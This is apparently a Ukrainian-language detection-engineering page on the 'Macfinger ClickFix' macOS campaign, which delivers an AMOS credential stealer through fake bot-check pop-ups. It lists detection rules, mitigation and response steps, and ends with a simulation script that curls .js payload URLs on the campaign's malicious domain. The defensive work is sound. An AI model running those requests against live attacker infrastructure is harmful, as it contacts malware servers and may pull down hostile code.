Кампанія Macfinger ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Нова кампанія соціальної інженерії, відслідковувана як Macfinger ClickFix, націлює користувачів macOS шляхом ін’єкції шкідливих скриптів на законні вебсайти. Атака представляє підроблені сторінки захисту від ботів, які обманом змушують жертв виконувати команди, що завантажують шкідливе програмне забезпечення, специфічне для macOS. Шкідливий код виглядає як варіант Atomic macOS Stealer (AMOS), призначений для збору облікових даних та іншої інформації користувача.
Розслідування
Розслідування виявило, що законні вебсайти були скомпрометовані шляхом ін’єкції скриптів, які відображають підроблені спливаючі вікна перевірки. Аналіз мережевого трафіку виявив спеціалізований домен для відстеження користувачів, а також кілька IP-адрес, що підтримують доставку шкідливого ПЗ та зв’язок з командним сервером (C2). Спостережувані шаблони трафіку вказують на ексфільтрацію облікових даних та системної інформації через HTTP POST запити.
Пом’якшення
Користувачів слід навчати уникати слідування інструкціям, представленим несподіваними спливаючими вікнами в браузері або підробленими сторінками перевірки ботів. Організаціям слід впроваджувати веб-фільтрацію для блокування відомих шкідливих доменів і IP-адрес, пов’язаних з кампаніями ClickFix. Також рекомендується стежити за незвичними вихідними з’єднаннями із ненадійними IP-адресами через нестандартні порти.
Відповідь
Якщо виявлено активність Macfinger ClickFix, уражені хости macOS повинні бути негайно ізольовані для запобігання подальшій ексфільтрації даних. Реагуючі повинні провести повне судово-медичне розслідування для визначення ступеня компрометації облікових даних. Потенційно скомпрометовані облікові дані слід скинути, а системи перевірити на наявність механізмів збереження, таких як несанкціоновані скрипти shell або виконувані файли Mach-O.
Потік атаки
Ми все ще оновлюємо цю частину.
Виявлення
Можлива спроба зв’язку з доменом через IP Lookup (через dns)
Підозріла команда та управління через запит DNS з незвичним доменом верхнього рівня (через dns)
Можлива спроба переліку System_profiler (через process_creation)
Можлива маніпуляція з рядками, зашифрованими Base64 [MacOS] (через cmdline)
Підозріла спроба виконання Curl [MacOS] (через cmdline)
IOC (HashSha256) для виявлення: кампанія Macfinger ClickFix
IOC (SourceIP) для виявлення: кампанія Macfinger ClickFix
IOC (DestinationIP) для виявлення: кампанія Macfinger ClickFix
Виявити трафік кампанії Macfinger ClickFix [Firewall]
Виявити ін’єкцію скриптів Macfinger ClickFix [Webserver]
Виконання симуляції
-
Опис атаки та команди: Зловмисник використовує техніку соціальної інженерії, відому як «ClickFix», коли користувача спонукають натиснути кнопку (часто це підроблене «виправлення» або «оновлення»), що виконує шкідливий скрипт. У цій симуляції ми відтворюємо фінальну стадію: браузер/агент на стороні клієнта робить запит до контролюючого домену Macfinger
velvet-otter-glagceis.lifeдля завантаження шкідливого.jsфайлу. Цей запит спрямований на відповідність одному з трьох специфічних критеріїв вибору в логіці виявлення. -
Скрипт регресійного тесту:
#!/bin/bash # Скрипт для симуляції запуску правила виявлення Macfinger ClickFix echo "[*] Запуск симуляції Macfinger ClickFix..." # Ціль 1: вибір 1 (параметр сайту) echo "[*] Симуляція запиту до вибору 1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Ціль 2: вибір 2 (специфічний файл з хешем) echo "[*] Симуляція запиту до вибору 2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Ціль 3: вибір 3 (файл ext-b) echo "[*] Симуляція запиту до вибору 3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Симуляцію завершено. Перевірте SIEM для оповіщень." -
Команди очищення:
# Місцеве очищення не вимагається, оскільки це вихідні мережеві запити. # Якщо були створені місцеві файли, видаліть їх: rm -f /tmp/macfinger_test_*